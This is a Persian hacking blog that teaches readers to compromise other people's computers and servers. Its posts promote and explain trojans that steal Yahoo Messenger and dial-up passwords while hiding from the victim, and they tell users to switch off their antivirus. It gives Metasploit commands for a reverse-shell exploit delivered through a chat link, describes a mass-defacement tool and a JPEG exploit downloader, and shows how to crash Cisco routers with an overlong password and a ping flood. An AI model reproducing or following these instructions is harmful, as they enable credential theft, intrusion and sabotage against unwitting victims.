تبليغاتX
آموزش هک
احسان وكيل

احسان وکیل blackhat-n.blogfa.com

آموزش هک

صفحه نخست

آرشيو وبلاگ

پست الکترونيک

درباره وبلاگ


آرشیو موضوعی
آموزش هگ
آموزش گیتار
آموزش ساب سون


پیوندها
دانلود
یه وبلاگ.هرچی بخوای,
مطالب سياسي،اقتصادي،اجتماعي،فرهنگي
korn music
آموزش گیتار
وبی رمانتیک
وب هرچی دوست داری توش داره .دانلود کن حال کن
سایت برای خرید قطعه کامپیوتر و نرم افزار
ترانه های خط خطی
خدای وبلاگ ها
هیچ کس
:: قالب بلگفا ::


امکانات
اين وبلاگ را صفحه خانگي خود كنید! ذخيره كردن صفحه! اضافه کردن این وبلاگ به علاقه مندیها! لینک RSS

طراحی قالب وبلاگ

salam dostane aziz in web az farda be roz mishavad
ehsan vk

نوشته شده توسط احسان وکیل در دوشنبه هشتم مرداد 1386 ساعت 10:53 | لینک ثابت |


اين برنامه، پسورد ياهو مسنجر قرباني را براي شما به صورت PM ارسال مي کند.

با آمدن ياهو مسنجر ورژن 6، تمام برنامه هاي PS(Password Sender) قديمي از کار افتادند. و ديگر نمي توانند براي شما پسورد ارسال کنند.

يعني چنانچه طرف از ياهو مسنجر 6 استفاده کند، ديگر نمي توان با استفاده از اين برنامه ها، پسورد وي را پيدا کرد.

crack اين توانايي را دارد که در ياهو مسنجر 6 هم پسورد را براي شما ارسال کند. يعني براي اين برنامه فرقي ندارد که طرف از چه ورژني از ياهو مسنجر استفاده مي کند. و در هر صورت پسورد را براي شما ارسال خواهد کرد. و به قول معروف، اين برنامه Backward-Compatible است. چون هنوز تعدادي هستند که از ياهو مسنجر 5 استفاده مي کنند.



مزيت ها

اين برنامه علاوه بر سازگار بودن با ياهو مسنجر 6، مزيتهايي نيز نسبت به PS هاي ديگر دارد. که شرح مي دهيم:

· مهمترين مزيت اين برنامه اين است که شما براي پيدا کردن پسورد طرف، ديگر لازم نيست صبر کنيد که طرف يک بار ديگر به مسنجر Login کند. crack پسورد را همان لحظه براي شما ارسال خواهد کرد. البته پسورد را در دفعات بعدي Login نيز ارسال مي کند. يعني از آن پس هر کسي در آن کامپيوتر به مسنجر Login کند، پسورد او نيز براي شما ارسال خواهد شد.

· crackداراي قابليت Custom Icon مي باشد. يعني شما مي توانيد هر آيکوني که خودتان خواستيد براي سرور بگذاريد. به عنوان مثال مي توانيد آيکون برنامه ي Notepad را روي سرور بگذاريد. که البته براي اين کار نياز به برنامه ي IconCollector 1.0 داريد. که مي توانيد آن را از اينجا دانلود کنيد:

· Download IconCollector

· اين برنامه قابليت رد گم کردن دارد. يعني برخلاف PS هاي ديگر که براي رد گم کردن، MessageArchive طرف را به کل پاک مي کنند، crack کاري مي کند که اصلا PM مربوط به فرستادن پسورد، در مسج آرشيو ثبت نمي گردد. لذا قابل رديابي نيست.

· اين برنامه Unknown Startup است. يعني طرف با آوردن MsConfig قادر به پاک کردن crackاز سيستم نيست.





قابليت هاي برنامه

1- Disable TaskManager

2- Disable Registry

3- Disable MsConfig

4- Disable Yahoo! Save Password

5- Send IP

6- Send OS Name

7- Send Password OnTime

8- Melt After Install

9- Filename After Install

10- Fake Error Message

11- Jpeg , Setup , Custom Icons

12- Binder

13- Unknown Startup

14- No PM in Message Archive

برایه استفاده آنتی ویروس خود را خاموش کنید.

اینم لینکه داونلود.
Click here for get.

نوشته شده توسط احسان وکیل در سه شنبه بیست و نهم اسفند 1385 ساعت 1:46 | لینک ثابت |

هک از طریق چت بدون ازسال فایل

در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد که قبلآ نحوه ی کار و دستورات آن در سایت آموزش داده شده لینک دریافت Metasploit framework-2.5 - لینک آموزش کار با آن توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من http://217.216.30.40 باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن
بزنید set PAYLOAD win32_reverse و بعد ان
بزنید set HTTPHOST 217.216.30.40 و بعد آن
بزنید set LHOST 217.216.30.40
و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک http://217.216.30.40:8080 را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید . برای ارسال و گرفتن فایل هم می توانید به مقاله ی آموزشی که در سایت قرار داده شده رجوع کنید لینک اموزش ارسال فایل در shell با tftp

نوشته شده توسط احسان وکیل در سه شنبه بیست و نهم اسفند 1385 ساعت 1:45 | لینک ثابت |

معرفی Metasploit Framework و نحوه کار با آن

Metasploit Framework مجموعه ای از باگ های سیستم عامل ها و برنامه های آن ها می باشد که به در یافت Shell و دسترسی کامل به سیستم هدف ختم میشود .در حال حاضر این مجموعه دارای 81 باگ می باشد که بسیاری از آن ها هنوز patch نشده وبرای هک کردن سرور و یا کلاینت ها بهترین انتخاب می باشد .این برنامه گزینه ی update داشته و خودش را بوسیله آن به روز می کنید و شما را از پیدا کردن bug های جدید و compile آن ها بی نیاز میکند .این برنامه حالت های payload مختلفی دارد که کارائی فراوانی دارد برای شروع پس از دریافت آن از اینجا و updtae آن باید در داخل برنامه
تایپ کنید show exploits که با این دستور لیست باگ ها نمایش می یابد و شما میتوانید با دستور use exploit name یکی از آن ها را اجرا کنید در آن جا

show PAYLOADS این دستور لیست حالت های اتصال را نمایش می دهد . مثلآ و قتی در سیستم طرف firewall وجود دارد با انتخاب payload ه win32_reverse با کمک این دستور set PAYLOAD win32_reverse به برنامه می گوئید که در گرفتن shell سیستم ارتباط از طرف سیستم قربانی با شما باشد تا بتواند firewall را دور بزند (چون او به شما وصل شده و فایروال تنها با دریافت مشکل دارد)
set RHOST 66.66.78.44 با این دستور به برنامه می گویید که ip remote host کسی که می خواهید از آن shell بگیرید 66.66.78.44 می باشد
set LHOST 65.76.54.77 با کمک این دستور به برنامه می گوئید که ip شما 65.76.54.77 می باشد . این گزینه در حالت payload ه win32_reverse استفاده می شود تا سیستم قربانی به این ip وصل شود
show TARGETS لیست سیستم های آسیب پذیر در این باگ را نمایش میدهد با عدد خاص رویروی آن مثلآ All Windows 0 شما با استفاده از دستور set TARGET 0 به برنامه میگوئید که All Windows می باشد
show OPTIONS لیست متغیر های مقدار پذیر مانند RHOST و ... را با مقدار داده شده توسط شما نشان می دهد که برای کنترل درستی کار مفید می باشد
exploit این دستور با داده های ورودی شما شروع به shell گرفتن می کند
starting bind handler
get connection from

نوشته شده توسط احسان وکیل در سه شنبه بیست و نهم اسفند 1385 ساعت 1:41 | لینک ثابت |

دزدین پسورد دایال آپ

سلام دوستان
این برنامه رو همین الان پیدا کردم و رو خودم امتحان کردم و چون کار کرد اومدم اینجا هم بذارمش.
کار این برنامه اینه که میتونه پسورد دایال آپ دیگران رو کش بره و برای شما ایمیل کنه.
از اونجایی که من این رو گرفتم آموزش کامل نداده بود ولی من کاملا آموزش میدم:

نام برنامه: XP Dialup Stealer
نسخه: Beta 2.0
عکس برنامه:



لینک دانلود:
DOWNLOAD

حجم: 145 کیلوبایت

فایل های آرشیو: Comdlg32.ocx و XP Dialup Stealer Beta 2.0.exe

آموزش:
اول برنامه رو از لینک بالا بگیرید و Unzip کنیدش.
بعد فایل XP Dialup Stealer Beta 2.0.exe رو باز کنید.

قسمت Option
----------------
Send Comp UserName: با تیک زدن این گزینه نام کاربری طرف تو ویندوز براتون ارسال میشه.

Send Computer Name: با تیک زدن این گزینه نام کامپیوتر طرف براتون ارسال میشه

Send Dialup Password: با تیک زدن این گزینه، یوزر و پسورد و شماره تلفن تمام دایال آپ های طرف براتون ارسال میشه.

Change Comp UserName Password: با تیک زدن این گزینه پسورد کاربری طرف به چیزی که در تکست باکس پایینش مینویسید عوض میشه.

Auto Startup: ویروس در استارت آپ سیستم طرف قرار میگیره تا هر وقت ویندوز بالا اومد ویروس هم اجرا بشه و دوباره ایمیلی که حاوی پسورد دایال آپ طرف هست براتون ارسال بشه.

Hide From Task Manager: با تیک زدن این گزینه، نام ویروس در تسک منیجر طرف نمایش داده نمیشه.

Disable Mouse & Keyboard…: با تیک زدن این گزینه هر 30 ثانیه یک بار طرف نمیتونه از ماوس و کیبورد خودش به مدت 30 ثانیه استفاده کنه. ( فکر میکنم از تابع BlockInput توابع ای پی آی استفاده کرده باشه. )

Fake Error Message: با تیک زدن این گزینه وقتی طرف ویروس رو باز کرد یه پیغام با متن و پیغامی که شما مشخص میکنید نمایش پیدا میکنه.

قسمت Virus Icon
---------------------
در این قسمت باید یک آیکن برای ویروس خودتون انتخاب کنید، همچنین این برنامه میتونه از آیکون هایی که خودتون به برنامه میدید هم استفاده کنه.

قسمت Create Virus
-------------------------
Installation File Name: در این قسمت باید یک نام وارد کنید تا ویروس شما با این نام در سیستم طرف کپی بشه.

Your E-Mail Address: در این قسمت باید ایمیل خودتون رو وارد کنید تا اطلاعاتی نظیر پسورد دایال آپ و... به اون ارسال بشه

Virus Name: در اینجا باید یک نام برای ویروس خودتون انتخاب کنید که نام فایل خوروجی شما هست.

حالا بر روی دکمه Create Virus کلیک کنید تا در پوشه ای که برنامه قرار دارد فایلی با نامی که در قسمت Virus Name وارد کردید ساخته شود.
حالا اون فایل رو به هر کسی بدید و طرف روش کلیک کنه اطلاعاتی رو که تیک زدید رو به ایمیل شما میفرسته و بعدش خودش رو میبنده تا دفعه بعد که طرف ویندوزش رو روشن کرد و وارد اینترنت شد دوباره اطلاعات رو بفرسته.

نوشته شده توسط احسان وکیل در سه شنبه بیست و نهم اسفند 1385 ساعت 1:39 | لینک ثابت |



برای دریافت برنامه اینجا کلیک کنید - - - - - - - برای خرید نسخه ی full version اینجا کلیک کنید

آخرین ویرایش 18/10/85 اگر قبل از این تاریخ این نسخه را دریافت کرده اید . نسبت به دریافت دوباره اقدام کنید


این برنامه برای تست امنیت سرور ها ی لینوکس و ترجیحآ دارای cpanel و پیدا کردن سایت های آسیب پذیر روی آن می باشد و این کار را با کپی کردن فایل درخواستی شما بر روی سایت های دیگر روی سرور انجام می دهد
این برنامه شباهت هایی با تروجان دارد از این نظر که شما یک فایل که در پوشه برتامه با نام idf.php موجود است را بر روی یک سایت اپلود می کنید و آدرس آن را به برنامه می دهید و برنامه از طریق آن با سرور ارتباط برقرار می کند و به تست امنیت سرور و سایت های آن می پردازد .
برای شروع شما بایستی علاوه بر آدرس idf.php , ادرس deface.htm را نیز به برنامه بدهید تا این فایل را روی سایت های دیگر سرور کپی کند
پس از آدرس دهی روی Get Site List کلیک کنید . در این مرحله برنامه لیست کل سایت های سرور را نمایش می دهد و شما با کلیک روی سایت مربوطه امنیت آن را چک می کنید و در صورت نا امن بودن فولدر های آسیب پذیر آن لیست می شود و شما با کلیک روی آن فولدر می توانید فایل deface.htm را روی آن کپی کنید . انجام تمام مراحل تنها با کلیک کردن می باشد.
شما هم چنین می توانید با انتخاب حالت automatic به برنامه این اجازه را بدهید تا کلیه کار ها را بدون کلیک شما و به تنهایی انجام دهد و کلیه سایت های سرور را پردازش کند و کوتاه ترین فولدر های هر سایت را برای کپی کردن deface.htm انتخاب کرده و کپی کند
از امکانات دیگر برنامه می توان به قسمت connect back اشاره کرد . در این بخش شما می توانید از سرور shell بگیرید حتی اگر تمامی کامند ها ( فانکشن های شلر مانند system و ... ) بسته باشد
قسمت Zone-h reporter این امکان را به شما می دهد که لیست سایت های آسیب پذیر را به zone-h گزارش دهید با سرعت بالا و پردازش سایت های ثبت شده , قبلآ ثبت شده و دیگر حالت ها ( اگر 1 سایت از 10 سایت مانع از ثبت سایت های دیگر شود . 9 سایت باز برای ثبت ارسال می شود و خطای کار در این روش 0 است )

برنامه 2 حالت استفاده دارد ( limited و full version ) و تفاوت آن ها در این است که برنامه در حالت limited تنها قادر به چک کردن امنیت 40 سایت اول سرور می باشد و تمام امکانات دیگر مشابه است . برای حالت full version بایستی نسبت به خرید و دریافت سریال با کلیک روی اینجا اقدام کنید

ادامه مطلب

نوشته شده توسط احسان وکیل در سه شنبه بیست و نهم اسفند 1385 ساعت 1:36 | لینک ثابت |

سلام

عزیزان نظر یادتون نره

نوشته شده توسط احسان وکیل در جمعه هجدهم فروردین 1385 ساعت 0:45 | لینک ثابت |

ترويا (Troya) برنامه اي براي كنترل كامپيوتر از راه دور، از طريق وب است.

اين برنامه تروجاني بدون كلاينت (Client) است. يعني برخلاف تروجانهاي ديگر كه براي وصل شدن به كامپيوتر هدف نياز به يك برنامه ي جداگانه به نام كلاينت داشتند، اين برنامه نيازي به Client ندارد.

روش عملكرد اين برنامه بدين صورت است كه شما از Internet Explorer براي وصل شدن به كامپيوتر هدف استفاده مي كنيد. يعني در ترويا (Troya) كامپيوتر هدف شما به صورت يك سايت اينترنتي در مي آيد كه با وارد كردن IP آن در مرورگر وب، مي توانيد به آن كامپيوتر از راه دور دسترسي داشته باشيد.

مثال:http://217.218.10.16     بدبن صورت شما فقط كافي است سرور را در كامپيوتر هدف اجرا كنيد   روی ادامه ی مطلب کلیک کنید



 و بعد از آن در هر شرايطي مي توانيد به كامپيوتر هدف وصل شويد. زيرا احتياجي به Client نيست.

 

مزيت ها

  • مهمترين مزيت اين برنامه همانطور كه اشاره شد، راحت الاستفاده بودن آن است. بدليل نياز نداشتن به Client.
  • ديگر مزيت اين برنامه، توانايي سرويس دهي به چند كاربر همزمان است. به عنوان مثال در تروجانهاي ديگر مانند ترانژوا  (Tranzhva)، دو كاربر همزمان نمي توانستند فايلي دانلود كنند. اما در ترويا (Troya) بيش از يك كاربر به طور همزمان مي توانند به فايلهاي كامپيوتر هدف دسترسي داشته باشند. درست همانند يك سايت كه مي تواند بيش از يك بيننده در آن واحد داشته باشد.
  • Live Server Update. مزيت ديگر اين برنامه تونايي بروز رساني خودكار است. يعني اگر اشكالي در ترويا پيدا شود، بعد از رفع شدن اين اشكال، سرور به طور خودكار در كامپيوترهاي هدف بروز رساني مي شود.
  • Live HTML Update: طراحي صفحات ترويا قابل به روزرساني است.

 

قابليت ها

بعد از وصل شدن به كامپيوتر هدف، مي توانيد كارهاي زير را انجام دهيد:

 

1-      ديدن فايلهاي كامپيوتر هدف و دانلود آنها (File Manager)

2-      عكس گرفتن از صفحه كامپيوتر هدف (Screen Capture)

3-      ديدن پنجره هايي كه در حال حاضر در محيط ويندوز وجود دارند. (Window Manager)

4-      ديدن برنامه ها و پروسه هاي در حال اجرا در ويندوز و بستن آنها. (Process Manager)

5-      تغيير دادن مختصات صفحه نمايش (Screen Resolution)

      6-      از كار انداختن فايروال در ويندوز XP.

7-      جلوگيري از بسته شدن ناگهاني سرور.

 

نوشته شده توسط احسان وکیل در چهارشنبه دوم فروردین 1385 ساعت 11:35 | لینک ثابت |

برنامه ی JPEG Downloader که بر اساس یک اکسپایلوت جدید نوشته شده که این آسیب پذیری در فایل هایی با پسوند jpeg وجود دارد و انواع مختلفی  داره  مانند buffer overflove , remote admin , download link که این برنامه از نوع آخره که میتونه یک سرور jpg از لینک تروجان شما بسازه که اگر این فایل توسط قربانی داونلود و با اینترنت اکپلورر بازبشه  فایل تروجان داونلود و نصب می شه . نسل جدید ویروس های اینترنتی با باگ های فوق و امثال آن دیگر قابل شناسایی نیستند                                                        حجم =6kb                 دریافت JPEG Downloader

نوشته شده توسط احسان وکیل در چهارشنبه دوم فروردین 1385 ساعت 11:32 | لینک ثابت |

در مورد روترها , این که چی هستن و چطور میشه با اونها ارتباط برقرار کرد و کار کرد صحبت خواهیم کرد . این متن بصورت سریالی خواهد بود , و این قسمت اول :



Router چیه ؟
رو به دو دسته تقسیم میکنن :

روتر های سخت افزاری: ( که یک دستگا ه صرفآ برای ما کار routing رو انجام میده , و برای کارش هیچ احتیاجی به یه کامپیوتر نداره , بلکه خودش درست مثل یک کامپیوتر Ram,CPU,System-Board,Slot,… داره و البته سیستم عامل مخصوص به خود که به اسم IOS هم اون رو میشناسن . یه روتر سخت افزاری درست مثل یه کامپیوتر محل های برای اضافه کردن کارت های جانبی و ... رو داره .



روترهای نرم افزاری : ( که در واقع بک روترسخت افزاری شبیه-سازی شده هستن .ازنظر کارکردی عملآ کار یک روتر نرم افزاری رو میکنن ولی خیلی مزایا و کارها هست که فقط توسط یک روتر واقعی ( سخت-افزاری) قابل انجام هست ... . روترهای نرم افزاری رو همون سیستم عامل ها شبیه سازی میکنن . و در واقع میشه گفت که یک سیستم عامل رو (توسط امکاناتی که خودش بما داده , مثلآ Routing and Remote access در ویندوزهای سرور مایکروسافت . ) جوری تنظیم میکنن که کار یک روتر رو برای ما انجام بده . در یک سیستم عامل وثل ویندوز 2000 سرور , این کار به راحتی نصب 2 عدد کارت شبکه و راه-اندازی یک سرویس هست ! ولی در سیستم عاملی مثل یونیکس/لینوکس با کمی دردسر بیشتر هم همراه خواهد بود . J



کار یک Router چیه ؟
روترها همونطور که از اسمشون پیداست (Router=مسیر یاب ) کارشون مسیر یابی برای بسته ها (Packet)ی اطلاعات در شبکه هست . روتر میگرده و بطور مثال کوتاه ترین مسیر رو برای رسیدن این متن از سرور ما به کامپیوتر شما , کوتاه ترین مسیر رو از بین هزاران-هزار کامپیوتر متصل به اینترنت پیدا میکنه . البته این کار به این سادگی که شنیدین نیست و بر عکس یک کر پیچیده هست که فقط روتر ها اون کار رو بلدن , به کسی هم یادش نمیدن. J یه روتر همچنین میتونه دو شبکه مجزا رو که هر کدوم nodeهای خودشون دارن رو به هم وصل کنه .
یه روتر همچین میتونه مثلآ بصورت به Access Server عمل کنه . این اکسس سرور دقیقآ همون چیزی هست که شما وقتی شماره ISP رو میگیرید , ارتباط شما رو با سرور اونجا برقرار میکنه . IP هم که شما بعنوان Server-IP و یا Default-Gateway در گزارش IPConfig می بینید , در واقع IP همون Access Servere که یه روتر هست که به اون ابزاری ( کارت جانبی) اضافه کردن که کنترل و مدیریت مودم ها رو به عهده داره .
البته حتمآ میدونید که , این اکسس سرور نیست که به شما ip میده یا شما رو تغذیه میکنه ... .
البته این ها تنها کارهایی نیستن که یه روتر میکنه, بلکه کارهای بسیار زیاد و قابلیتهای مفید دیگری هم هستن که خارج از حوصله این متنه ... .



Router دستور کار خودش رو از کجا تهیه میکنه ؟
خوب ... . وقتی یه مدیر شبکه میخواد یه کاربر برای سرورش تعریف کنه, کامیوتری رو به شبکه اش اضاف کنه با مثلآ یه میل-سرور راه اندازی کنه , خیلی راحت میشینه پشت سرورش ( فرض میکنیم Win2000 AS) و بکمک Active-Directory service کابر جدید و کامپیوتر جدید رو به دامین (Domain) اضافه میکنه , و با نسب Exchange server میل سرورش رو هم راه میندازه .

ولی یه روتر که هیچکدام از این چیرها رو نداره... !!!! L نهایت لطفی که ممکنه جناب روتر بما کنه اینه که IOS prompt رو در اختیار ما بذاره که اون هم بصورت Text-Base هست , یعنی شما فقط با چیزی شبیه محیط Dos سر و کار دارید . حتمآ با ناراحتی تمام پیش خودتون این فکر رو میکنین که :" لعنتـــــــــی ... باید بشینم همه چی رو دونه دونه و با زیر-رو کردن قسمت های مختلف و زمخت و خشک ISO , وارد کنم ... " .

خوب این هم روشی هست واسه خودش . ولی احمقانه ترین کاری هست که یه admin ممکه انجام بده !!!

این کار مثل این میمونه که بشینی تموم تنظیمات active-directory رو از طریق ابزارهای اغلب تحت داسmicrosoft active-directory support tools انجام بدی , اون هم از روی همون سرور !!!!!!!!!!

ولی خوشبختانه راه دیگری هم هست که اون , همونStartup-Config روتر ماست .

این startup-config فایلی هست که برای یک روتر , دقیقآ همانند یک Command.com/Autoexec.bat/Config.sys برای سیستم عامل داس عمل میکنه . البته اضافه کردن command.com به لیست این مثال بنا به دلایلی درست نیست , ولی به همون دلایل هم (بعدآ خواهید دونست چرا ... ) میشه این رو حساب کرد . بگزریم .... .

نوشته شده توسط احسان وکیل در چهارشنبه دوم فروردین 1385 ساعت 11:28 | لینک ثابت |

چرا هك روتر سيسكو ؟

زيرا اونا در هك كردن سرور خيلي مهم هستند يعني اگه بتونيم وارد روتر بشيم يعني سرور دود ميشه.

 پيدا كردن روتر سيسكو...

آسون ترين راه براي پيدا كردن روتر سيسكو همون tracert است كه شما بايد يه ip دلخواه رو ، روي اين دستور امتحان كنيد . كه در اين روش حتماً نام روتر سيسكو ديده مي شود يه راه ديگه هم است و اون استفاده از دستور nslookup است كه ip روتر سرور ي كه از اون اسفاده مي كنيد را به شما مي دهد

می توانید برای پیدا کردن روتر از برنامه ی Cis scan که برای پیدا کردن روتر سیسکو روی یک رنج آی پی به کار میرود نیز استفاده کنید     دریافت Cis Scan

یرای پیدا کردن روتر با این برنامه یک رنج را با آی پی ابتدا و انتها برای برنامه مشخص کنید و چند لحظه بعد آی روتر روی این رنج نمایان می شود با توجه به تعداد آن

 . شما الان ip روتر را پيدا كرده ايد  

حال بايد ديد كه روي روتر فايروال است يا نه .

براي اين كار ازping و telnet استفاده مي كنيم . زماني كه از دستورping استفاده مي كنيم اگر روتر را ping كرد مي شود گفت كه روي روتر فايروال نيست و زماني كه از دستور telnet استفاده مي كنيم اگر فقط از ماه پسورد خواست مي توان گفت كه ما در روتر هستيم (اينم از اين)

روش نفوذ ؟

روترهاي سيسكو كه از برنامه ي v 4.1 استفاده مي كنند به راحتي reboot مي شوند يه اين طريق كه به ايپي روتر تلنت كرده و يك مقدار بسيار طولاني پسورد را به جاي پسورد وارد مي كنيم مثل:

10293847465qphwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiruty

alskdjfhgzmxhgjhcbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019d

sk1029hhhfghj3847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qp

woeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv

019dsk10293847hj65qpwoeirutyalskdjfhgzmxncbv019dsk1029xncbv019dsk

روتر سيسكو در اين حالت احتمالاً reboot خواهد شد . حالا شما مي توانيد آن را هك كنيد ، چون در اين حالت offline است كه شايد بعد از 2 تا 10 دقيقه دوباره بالا بيايد .هنگامي كه روتر ريست شد تمامي يوز و پسورد هاي آن به حالتdefault بر مي گردد كه مثلاً يوز و پسوردadmin و admin يك يوزر و پسورد default است كه با اين يوزر و پسورد مي توانيد وارد روتر شويد و تماميconfig هاي آن را دستكاري كنيد ولي اگر ريبوت نشد با يك حمله شديد

Ddos مثل دستور زير مي توانيد آن را ريبوت كنيد :

Ping -l 56550 cisco.router.ip -t

نوشته شده توسط احسان وکیل در چهارشنبه دوم فروردین 1385 ساعت 11:27 | لینک ثابت |

سلام

با شما دوستان عزیز که نوشتین وبلاگ خیلی بی روح هستش

من فکر نمی کنم در وبی که هک یاد داده میشه مشاعر باید گذاشت یا اینک عکس گل و بلبل برا تون بزارم از وبلاگ ها زیاد هست کافیه تو گوگل بنوسی شروبر کلی حال می کنید

آریو وکیل

نوشته شده توسط احسان وکیل در پنجشنبه پانزدهم دی 1384 ساعت 21:0 | لینک ثابت |

سلام

شما دوستان عزیز چرا نظر نمیدین

دیروز ۱۰۵۶نفر از عزیزان از وب دیدن کردن اما حتی بدوبیرا هم بارمون نکردن حداقل با بدوبیرا میفهمیدام وبم بهدرد نمیخوره میبستمش براتون شعر می نوشتم به خدا اون موقع بیشتر من وتحویل می گرفتین

:(

آریو وکیل

نوشته شده توسط احسان وکیل در دوشنبه دوازدهم دی 1384 ساعت 22:57 | لینک ثابت |

hey u ba to am  to ke shabo roz patoghet to chate

toke zendegit shode chato chat fekr mikoni zendegi hamine

arejone amat

man nemifahamam khoda chigozashte tokalat

bavar kon refigh aghebat in hame chat bazi chizi nist chon zelat

manozoram gheday jolo in melat

are midonam ba en nafar michati

inghadr michati ke mokhet migoze

vaghti ham dafe room javabeto nemidan yejorai konet misoze

in ke toham yelafi mese onay barat roshane mese roze

akhare salam rofoze mishi miri tokoze

<inja makhsose dostane na hacker<

FAGHAT BALADI TALKO BEGIRI GODGOD KONI

MOGHE GHOD GHODETAM KE MIGI MAN HACKERAM

YEKI AZ ON PAIN MIGE MAN YEKI CHAKERAM

TOHAM HAL MIKONI MARAM MIZARI MIGI NOKERAM

VALI VAKHTI YEKI MIGE MIKHAN  MANO  HACK MIKONANN

CHE KHAKI BERIZAM TO SARAM

FAGHAT MITONI BEGI MAN ALAN NEMITONAM AKHE YEKHORDE PAKARAM

  SOBH TA SHAB DARI CHAT MIKONI YA DARI MOKH MIZANI YA EDAYE HACK MIKONI

EHSAN VAkil

نوشته شده توسط احسان وکیل در شنبه دهم دی 1384 ساعت 13:59 | لینک ثابت |

دانلود

نوشته شده توسط احسان وکیل در پنجشنبه هشتم دی 1384 ساعت 16:43 | لینک ثابت |

کلیه ی حقوق این وبلاگ توسط احسان وکیل محفوظ است.طراحی شده توسط yas-Design
This Template Desined by Yas-Design Group